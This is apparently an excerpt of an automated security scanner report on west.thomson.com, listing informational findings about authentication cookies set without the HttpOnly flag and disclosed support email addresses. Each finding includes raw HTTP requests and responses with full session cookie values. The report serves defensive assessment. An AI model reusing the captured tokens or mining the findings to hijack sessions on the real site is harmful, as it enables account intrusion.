6.10. http://west.thomson.com/support/contact-us/default.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/support/contact-us/default.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:.WTCAUTH=89EA3F93E09614D9A098CCCF9C0F29D3204EE9663C01D51E95CD9C592CDADB23A34786B30EBABB2390E7FEA51BBE62180DADFAF255CA8AB719509015068D68C8075FE6A23F095DF549827C80033255DA36E699502293674B6D668FCAE278ADD04138D880C6A3F40E0EDE98A77853F1F1B45413E1BE2A34BEE937DCCCDA776CE1ABCED0F26FB69F2755769BB874466A73E9A83CADFE53A93539D3BD0332C48F697F141BAC00E38E27C2938518BE9D5C9648C952E2BEF872DC06486975DC27BFACFEF36294DEAF331A255D5995D5F54EF39A2AFCD97B20A7D318572959553AEEC610017BD6; path=/
Request
GET /support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OKSet-Cookie: .WTCAUTH=89EA3F93E09614D9A098CCCF9C0F29D3204EE9663C01D51E95CD9C592CDADB23A34786B30EBABB2390E7FEA51BBE62180DADFAF255CA8AB719509015068D68C8075FE6A23F095DF549827C80033255DA36E699502293674B6D668FCAE278ADD04138D880C6A3F40E0EDE98A77853F1F1B45413E1BE2A34BEE937DCCCDA776CE1ABCED0F26FB69F2755769BB874466A73E9A83CADFE53A93539D3BD0332C48F697F141BAC00E38E27C2938518BE9D5C9648C952E2BEF872DC06486975DC27BFACFEF36294DEAF331A255D5995D5F54EF39A2AFCD97B20A7D318572959553AEEC610017BD6; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]...
6.11. https://west.thomson.com/GlobalBackgroundStyles.5.1.421.22.ashx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/GlobalBackgroundStyles.5.1.421.22.ashx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:.WTCAUTH=31ACA283401DA17A05061FA0F538B8F86B7C65D5AB4A89A80E18F25BB77CEE40DB1033D80460E2C8E2A5472BD6CA74D385343046E024D8A9016A49A4B932722E3A8B6E13E322F378E10C55CE5C6D739F961129503F73317944D18CF6FC365195204B6B3DDC328162B313B90606D91909B6A1C8F543CA6E9896E8054786853477E91BF7A0F5CB5530F37A45203DF832D4841547B09AF64E9712AA65C817E0A78CBBD365CBD13686366C4F93CC55EB97CDAC4CE43C02380AC22DBB7C12A6CC859B899F5ADFFCC303480CB636B2447BED43ECFD31E730F41D8F75BCF8299C965EDBEDB25AD4; path=/
Request
GET /GlobalBackgroundStyles.5.1.421.22.ashx HTTP/1.1/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_sq=thwest%3D%2526pid%253DBankruptcy%252520Exemption%252520Manual%25252C%2525202010%252520ed.%252520%252528West%252527s%252526%252523174%25253B%252520Bankruptcy%252520Series%252529%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BshowPopupBubble%252528%252527ctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524ctl00%252524popu%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=A67F8B510CDBD58F31C838E207550441CEB1CACBCF20772FABFD044A384585124BA1797DC696288EE75DD493FCDA4E346EC5188BF838DB30477D657A2B3353079A4A75CC7ADF7B32C6DFC8CFB3EE9A58DA7FA502513F8B57574483FBFFFB85B197C174609DEBF07D119AF640ED1BDE7FA911D2469C6D1F6E4CFA3E4CD98E5EDA89F130ADB2B2BB195DEF71DA3D31374DF57A62DF7A9EB3103E3E90B8657C457C5A7DBC308AB465C8B88F9F9BB15ECBD076348E09B023DFF9E2C2D12FFA4890F4C4A7A979AA2F883A180B60FA2CEEB1997ED8D19C4A177200624EEB34DD1B8E1517173999
Response
HTTP/1.1 200 OKSet-Cookie: .WTCAUTH=31ACA283401DA17A05061FA0F538B8F86B7C65D5AB4A89A80E18F25BB77CEE40DB1033D80460E2C8E2A5472BD6CA74D385343046E024D8A9016A49A4B932722E3A8B6E13E322F378E10C55CE5C6D739F961129503F73317944D18CF6FC365195204B6B3DDC328162B313B90606D91909B6A1C8F543CA6E9896E8054786853477E91BF7A0F5CB5530F37A45203DF832D4841547B09AF64E9712AA65C817E0A78CBBD365CBD13686366C4F93CC55EB97CDAC4CE43C02380AC22DBB7C12A6CC859B899F5ADFFCC303480CB636B2447BED43ECFD31E730F41D8F75BCF8299C965EDBEDB25AD4; path=/ {background-image:url('https://images.west.thomson.com/organizations/headers/sidebar1.jpg');margin-top:2px;height:85px;width:241px}.Header_Org_SideBar2{background-image:url('https:...[SNIP]...
6.12. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/Promotions/EmailPreferences/Login.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:.WTCAUTH=A85C2F3C93F050051A95CC95A3B0888C03B9DBEF0A026D745D0656E2E3DE853394140B6D80EEE33684BAC22241C10BCEC46D800215998CBC7CB21197B52E754E19FAA6C1F1725A6249D03181F66A430ECE47F662E7EF119243B001BEA25F850311DCB9495BBDE849BAEAE38CFAF69EE6C71B979EC9A46B08E8C5B362E255E6FCD960E943F41886886E045C4EB97A5121632E495A2DE980E64EC33F053829F75AEDFBDE371B36DC072FBB362065481E66F8EFF61623D579526A71AC8DD9F30FF1BFAD99A5FA5D2AE551F509B6E57AC0127A7E82DD4063747DCDE458BCBBFA35D0CE53B82A; path=/
Request
GET /store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OKSet-Cookie: .WTCAUTH=A85C2F3C93F050051A95CC95A3B0888C03B9DBEF0A026D745D0656E2E3DE853394140B6D80EEE33684BAC22241C10BCEC46D800215998CBC7CB21197B52E754E19FAA6C1F1725A6249D03181F66A430ECE47F662E7EF119243B001BEA25F850311DCB9495BBDE849BAEAE38CFAF69EE6C71B979EC9A46B08E8C5B362E255E6FCD960E943F41886886E045C4EB97A5121632E495A2DE980E64EC33F053829F75AEDFBDE371B36DC072FBB362065481E66F8EFF61623D579526A71AC8DD9F30FF1BFAD99A5FA5D2AE551F509B6E57AC0127A7E82DD4063747DCDE458BCBBFA35D0CE53B82A; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
6.13. https://west.thomson.com/store/secure/EmptyBasket.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/secure/EmptyBasket.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:.WTCAUTH=79CBDB991A6459338884A46B49D0105C145D63087A0F6EA1AF1008AF8F10A6BE20B4B11D124F705A3B3E14AC22EC73DD213F5F9EEB5214BC1762EE7929A0F454C61A0BDCF1DEC78E1A8885681779E756F6C33BB53E5D00DC20A327C71B7A18A01CD2DEC0CB430995B2D528EAE5EDE656A06490C12141D8DC1BDB52EA377E9C528F52835D9BB8C6526E44BC00F17481EEE8BAF4CEFD033D588FC1950953DF71D7BEC464ACA7CC296D962C2F89E8B7BF9E2164F2A2485B2AD03B442B72330D47CEE8F0DEFDB9FFFF7F71AE584B4FEA6F98140E539AF54249B185FB8811D025A5E2F4D81C75; path=/
Request
GET /store/secure/EmptyBasket.aspx HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_ppv=0; s_sq=%5B%5BB%5D%5D; UserSiteIdIdentifier=; .WTCAUTH=0D1C43F14C3D0360D4C56BDD0D49E3A1E347C13F76ADC1B282235271457FAC648FB37FE6B223762A24E6CB268609BC8463ECB71442613CE6C286443DD8C796AD188F8568D73785118A509021BEABBD4E55D10E5F1E3A4F4A3F1B558AB2332C44A56F489B0571AEA92276AE792D9D8761A0FBB7322D072015D4B719941EFD8FCB5CDB63E1CEF01EF859C876D1DA920B7EB3539BA4B4D934B5A3CF2F56BB805BA3F3435E9F173B50A3D9F7C34D0C8E7180A2F74BC8118F96769794F6D4C7A36DCE92EEA8FE38E72E95AF86A85ADB9338C9E73EDA3652910D79D1A7D57B6EF7422F00DB82A9
Response
HTTP/1.1 200 OKSet-Cookie: .WTCAUTH=79CBDB991A6459338884A46B49D0105C145D63087A0F6EA1AF1008AF8F10A6BE20B4B11D124F705A3B3E14AC22EC73DD213F5F9EEB5214BC1762EE7929A0F454C61A0BDCF1DEC78E1A8885681779E756F6C33BB53E5D00DC20A327C71B7A18A01CD2DEC0CB430995B2D528EAE5EDE656A06490C12141D8DC1BDB52EA377E9C528F52835D9BB8C6526E44BC00F17481EEE8BAF4CEFD033D588FC1950953DF71D7BEC464ACA7CC296D962C2F89E8B7BF9E2164F2A2485B2AD03B442B72330D47CEE8F0DEFDB9FFFF7F71AE584B4FEA6F98140E539AF54249B185FB8811D025A5E2F4D81C75; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
6.14. https://west.thomson.com/store/secure/ShippingInfo.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/secure/ShippingInfo.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:.WTCAUTH=C92933A45E8BBE47C7EEF54F80B6D25789CF3B0DE11279B4960956BC8BB0E345579BADF326956E9721B67D71932107D3B64238D6EE6707D06C81817121C5953C161DDD49619F87B8AE2E421C792976F48CA556F7DB0C834EB3BE231FCF4A767E58A07AA7485840E793C3A65F7DEB1BA7BD4CA2E971C144356D50FC6DD68AFCB7569D943E22EBDA2359D2DDAFEEB65197678B43B591B46F28E9EA05EC9F8FE84A521E37C1F57160F4EE7D67E36501BABC3987B29619274E9EBC26949903E1FDAEC56DB8129C91303E8A4BE5A28D8839FB0A532C6B8B24419839BF14AB2C51AD3259D6DF7F; path=/
Request
GET /store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2c+title%2c+author+or+ISBN&Ctl00%24placeHolderTopNavigation%24placeHolderContent%24basketItems%24ctl00%24txtQuantity=1&ChkCCMe=CC+Me&PageTitle=cart HTTP/1.1/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_sq=thwest%3D%2526pid%253DBankruptcy%252520Exemption%252520Manual%25252C%2525202010%252520ed.%252520%252528West%252527s%252526%252523174%25253B%252520Bankruptcy%252520Series%252529%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BshowPopupBubble%252528%252527ctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524ctl00%252524popu%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=9DFF38C2ED245A836B638A4FD2BB05048EFDFD2A3F3BC8DC4D0876357DAC06B163234E108A8F0DA6FFB919F8831205FF1893BF274F77770E9447A6CF6832F99911CAEA4F06343A555BDF7037EBDAD0392A3B821D6A252C115D9D10A1FD2B10DE395F8581D4BBE49B8B4EF6A088A00BE982BA5CBAAC1C23CD6D40E8E10C4A8CB90101D3CE531D7618D4A99EC6ED09D86A6A87BEB92C84EBB5541C5F4267CA16C317ED73CD9AD52E9BCFFCFA39E7A4F7561999EF701967F4FAEE3513AC9E115F783D6CA97286E2B3D06563DA39F267FA170B8C51C76EEB06DDD6F99A112D49B9ED48435EDE
Response
HTTP/1.1 200 OKSet-Cookie: .WTCAUTH=C92933A45E8BBE47C7EEF54F80B6D25789CF3B0DE11279B4960956BC8BB0E345579BADF326956E9721B67D71932107D3B64238D6EE6707D06C81817121C5953C161DDD49619F87B8AE2E421C792976F48CA556F7DB0C834EB3BE231FCF4A767E58A07AA7485840E793C3A65F7DEB1BA7BD4CA2E971C144356D50FC6DD68AFCB7569D943E22EBDA2359D2DDAFEEB65197678B43B591B46F28E9EA05EC9F8FE84A521E37C1F57160F4EE7D67E36501BABC3987B29619274E9EBC26949903E1FDAEC56DB8129C91303E8A4BE5A28D8839FB0A532C6B8B24419839BF14AB2C51AD3259D6DF7F; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
6.15. https://west.thomson.com/store/secure/ShippingLocation.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/secure/ShippingLocation.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:.WTCAUTH=317228B45D05EAA4FDEA746AAC7BE43F8561B2A283AF9A5155875AD255B46C71677CBC8EA62E3B5CEE39AF7C22128258C3732C9D175B9FEACDC5F2E6FFE5693065611A01C05A38F1E5D84493B7967DC232D933B9102443C77BEF9BFF3E01C8CD15A6463509AC6370E2EC7A2CAB65CC2599C96298961A97FB8BF6C92BC20D040744C918ED8E0C8E71DAD17C3B61362A014C184546A8B80643B718BDEA4BE3456AA6D427C23674A519C4FBE32A9E223D084ADFF81BB8C05F51E37982CC1060BAA31A729FFE99953D24C027132FDB03700957643439D6CC8600B3DA1DBADB71D5F3DB402F3B; path=/
Request
GET /store/secure/ShippingLocation.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2c+title%2c+author+or+ISBN&Ctl00%24placeHolderTopNavigation%24placeHolderContent%24basketItems%24ctl00%24txtQuantity=1&ChkCCMe=CC+Me&PageTitle=cart HTTP/1.1/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; c=undefined571422undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shopping%20Cart; s_sq=thwest%3D%2526pid%253DShopping%252520Cart%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Btry%25257Bctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524btnProceedBottomHideSub%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=FDCDD3CCDE1E864402B9FC99C17C5B887E4F142C7E539940508F9F7479A6A6F433A5B1298DA99CBBD01CC94400DE585D91C0BC2044A5DA3945B77A521C66DF4338A0F22A9AE831BC4D28B1B360FFA8BC5F7FEFCCCD8455667134A5A3C8102426B33E2E3C145412DD2FC7BAE2D1CF511058AF4AC6C8158E791D929260CFD17BFDF9A91806384EB9892622A5C4D4B2F99ACA7BB96849E4E1F35EDDBE997CF3F1A087FAD644670217520402D18C4C7DC1B3E409FCCFD1749D5356AF72C2DE92A54626B4737812FE5F26773127B302BF70BC002DA3B3EDC640107FA24DBEFD453411A2E9878D
Response
HTTP/1.1 302 Found/store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2c+title%2c+author+or+ISBN&Ctl00%24placeHolderTopNavigation%24placeHolderContent%24basketItems%24ctl00%24txtQuantity=1&ChkCCMe=CC+Me&PageTitle=cartSet-Cookie: .WTCAUTH=317228B45D05EAA4FDEA746AAC7BE43F8561B2A283AF9A5155875AD255B46C71677CBC8EA62E3B5CEE39AF7C22128258C3732C9D175B9FEACDC5F2E6FFE5693065611A01C05A38F1E5D84493B7967DC232D933B9102443C77BEF9BFF3E01C8CD15A6463509AC6370E2EC7A2CAB65CC2599C96298961A97FB8BF6C92BC20D040744C918ED8E0C8E71DAD17C3B61362A014C184546A8B80643B718BDEA4BE3456AA6D427C23674A519C4FBE32A9E223D084ADFF81BB8C05F51E37982CC1060BAA31A729FFE99953D24C027132FDB03700957643439D6CC8600B3DA1DBADB71D5F3DB402F3B; path=/ >.thomson.com/store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=220...[SNIP]...
6.16. https://west.thomson.com/support/customer-service/order-info.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/support/customer-service/order-info.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:.WTCAUTH=62C8AFF94277E664484BBE7EC8277401DE5ADF5C5AEAF45D558739ADCD8069717EDC476F9611DA2668E59CB60B963048A7292391B9104F44FFCFB680230472EE9A68B087279430B80A9137BCF51FCBBE8CAA2B5135B21DAB33E2FF00B71448413EC9C7D9166F621CB8C527C88854A6B0E4DFD5CD34D4666CDACDA3442EF9704AA677452920C07B5940C397045601366D36704513C6FE9B69419D140474085B16735382FEB803D48FC173BBAFD3334424BF0894189520BF2901A304307E3DC9E63E08D54BB0A62CFE50A8B440B11838DBAA606EC4F2C964E593D9C23819FB20FA690F28E5; path=/
Request
GET /support/customer-service/order-info.aspx HTTP/1.1/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=E76869171E1A0ADDDC87DE0666682051A5ABA524C2901C7CCEF31A6788A7A438C98C00E7ABD27B50057AA9B35AF82318BE32CAAF21BCE46BA3E3E2EF6BAD7265022CF6605B0D106AF37CB15E717B49BE7FA125545B49CD98D1796358E96925E259D28F2A8CB5B16681BF5B9DE5EB533CEFC7E936BC98024D18199973772A2B0420054643FF9639F13C27CBBB80C1152B2BC7EF70BDEC6C72A6C3ED2F16912510EBC9C641BEB2DCBD2784D94A08DAC3A2CB0C92EBE86CA6DAE5A52262E83175C215F1D237D9058600C65D041AC94F24F8BD7FAFEA186A82F05284BBAB97540DA15E7C4840; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA
Response
HTTP/1.1 200 OK96EC21459B14B79587A583EC2F9BC37D2E75B5317EF0E65FAFEF6730683DB17DCF2BE06F0B1B98854DE5A707FC465E78510565D9EB9DAE71D857891B9157BA899B658EA734F816E3CE32760B05F6B24F34F4DF7A20D01665DF7E18DCAAC70E57C6EDF44A0197593C73CA0FAE6C559214D35FC361C5715FE43DBF19C70EBD085C78E9E5F286FC92ED8B559596ABC60CEFF4372C361E9E899AF7753D44DE2EF1A434F6907AE0EEE63371718A38CBFF23D5698B65E6F218C4AEADA2868A458441D2D6450C6DDD153EDB3A2CE7A069305EEEB72793F81C52FB84EB011536FEF0B; expires=Tue, 26-Apr-2011 21:13:49 GMT; path=/; HttpOnlySet-Cookie: .WTCAUTH=62C8AFF94277E664484BBE7EC8277401DE5ADF5C5AEAF45D558739ADCD8069717EDC476F9611DA2668E59CB60B963048A7292391B9104F44FFCFB680230472EE9A68B087279430B80A9137BCF51FCBBE8CAA2B5135B21DAB33E2FF00B71448413EC9C7D9166F621CB8C527C88854A6B0E4DFD5CD34D4666CDACDA3442EF9704AA677452920C07B5940C397045601366D36704513C6FE9B69419D140474085B16735382FEB803D48FC173BBAFD3334424BF0894189520BF2901A304307E3DC9E63E08D54BB0A62CFE50A8B440B11838DBAA606EC4F2C964E593D9C23819FB20FA690F28E5; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]...
7. Email addresses disclosed
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/support/contact-us/default.aspx
Issue detail
The following email addresses were disclosed in the response:bookstore@westgroup.com techsupport@thomsonreuters.com west.customer.service@thomson.com west.fed.govt@thomson.com west.referenceattorneys@thomson.com
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
Request
GET /support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OK614D9A098CCCF9C0F29D3204EE9663C01D51E95CD9C592CDADB23A34786B30EBABB2390E7FEA51BBE62180DADFAF255CA8AB719509015068D68C8075FE6A23F095DF549827C80033255DA36E699502293674B6D668FCAE278ADD04138D880C6A3F40E0EDE98A77853F1F1B45413E1BE2A34BEE937DCCCDA776CE1ABCED0F26FB69F2755769BB874466A73E9A83CADFE53A93539D3BD0332C48F697F141BAC00E38E27C2938518BE9D5C9648C952E2BEF872DC06486975DC27BFACFEF36294DEAF331A255D5995D5F54EF39A2AFCD97B20A7D318572959553AEEC610017BD6; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... west.referenceattorneys@thomson.com " class="StandardLinkBlue Bold">...[SNIP]... techsupport@thomsonreuters.com " class="StandardLinkBlue Bold">...[SNIP]... west.customer.service@thomson.com " class="StandardLinkBlue Bold">...[SNIP]... 